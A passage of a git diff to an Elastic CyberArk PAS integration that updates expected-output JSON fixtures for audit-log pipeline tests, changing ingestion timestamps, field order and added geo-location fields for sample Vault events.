\u003cMessageID\u003e107\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:24\",\"IsoTimestamp\":\"2021-03-15T10:22:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"107\",\"Desc\":\"Delete File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"LastFailDate\",\"RequestId\":\"\",\"Reason\":\"Old Value=[1615803137]\",\"ExtraDetails\":\"\",\"Message\":\"Delete File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "107", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json index e7077e28818..a2187051847 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json @@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "rename file", - "ingested": "2021-12-09T13:36:37.213140700Z", + "ingested": "2021-12-14T14:42:00.696977337Z", "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e124\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"124\",\"Desc\":\"Rename File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "124", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json index 7cac419a9fb..7fb2baee082 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json @@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "rename file (cont.)", - "ingested": "2021-12-09T13:36:37.330972Z", + "ingested": "2021-12-14T14:42:00.832992567Z", "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e125\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eOperating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"125\",\"Desc\":\"Rename File (Cont.)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File (Cont.)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Operating System-UnixSSH-67.43.156.15-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File (Cont.)\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "125", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json index 44483af4a8c..830b0c56e6e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "unlock file", - "ingested": "2021-12-09T13:36:37.448414500Z", + "ingested": "2021-12-14T14:42:00.970763074Z", "original": "\u003c5\u003e1 2021-03-10T18:33:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:33:34\",\"IsoTimestamp\":\"2021-03-10T18:33:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"126\",\"Desc\":\"Unlock File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Unlock File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Unlock File\",\"GatewayStation\":\"\"}}}", "code": "126", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json index 065f1158bff..00e4a149ce8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json @@ -81,7 +81,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:36:37.558992Z", + "ingested": "2021-12-14T14:42:01.084842475Z", "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e130\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"130\",\"Desc\":\"CPM Disable Password\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Disable Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Disable Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "130", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json index aa9a17269aa..8c6f26df32a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "127.0.0.1" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", @@ -46,15 +39,22 @@ "host": { "name": "VAULT" }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:37.727184900Z", + "ingested": "2021-12-14T14:42:01.264305950Z", "original": "\u003c7\u003e1 2021-03-11T18:45:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:45:23\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:45:23Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e178\u003c/MessageID\u003e\\n \u003cDesc\u003eGet User's Details\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eGet User's Details\u003c/Action\u003e\\n \u003cSourceUser\u003eMaster\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eGet User's Details\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:45:23\",\"IsoTimestamp\":\"2021-03-11T18:45:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"178\",\"Desc\":\"Get User's Details\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Get User's Details\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Get User's Details\",\"GatewayStation\":\"\"}}}", "code": "178", "kind": "event", "action": "get user's details", "type": "error" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json index e19f27f504a..35228e8266b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -50,7 +59,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830911800Z", + "ingested": "2021-12-14T14:42:01.371001617Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -77,6 +86,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -120,7 +138,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830920400Z", + "ingested": "2021-12-14T14:42:01.371004151Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -147,6 +165,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -190,7 +217,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830924200Z", + "ingested": "2021-12-14T14:42:01.371004548Z", "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -217,6 +244,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -260,7 +296,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830928700Z", + "ingested": "2021-12-14T14:42:01.371004960Z", "original": "\u003c5\u003e1 2021-03-10T17:59:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:19\",\"IsoTimestamp\":\"2021-03-10T17:59:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -287,6 +323,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -330,7 +375,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830933200Z", + "ingested": "2021-12-14T14:42:01.371005305Z", "original": "\u003c5\u003e1 2021-03-10T17:59:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:27\",\"IsoTimestamp\":\"2021-03-10T17:59:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -357,6 +402,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -400,7 +454,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830937800Z", + "ingested": "2021-12-14T14:42:01.371005639Z", "original": "\u003c5\u003e1 2021-03-10T22:19:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:06\",\"IsoTimestamp\":\"2021-03-10T22:19:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -427,6 +481,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -470,7 +533,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830943200Z", + "ingested": "2021-12-14T14:42:01.371005985Z", "original": "\u003c5\u003e1 2021-03-10T22:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:15\",\"IsoTimestamp\":\"2021-03-10T22:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add 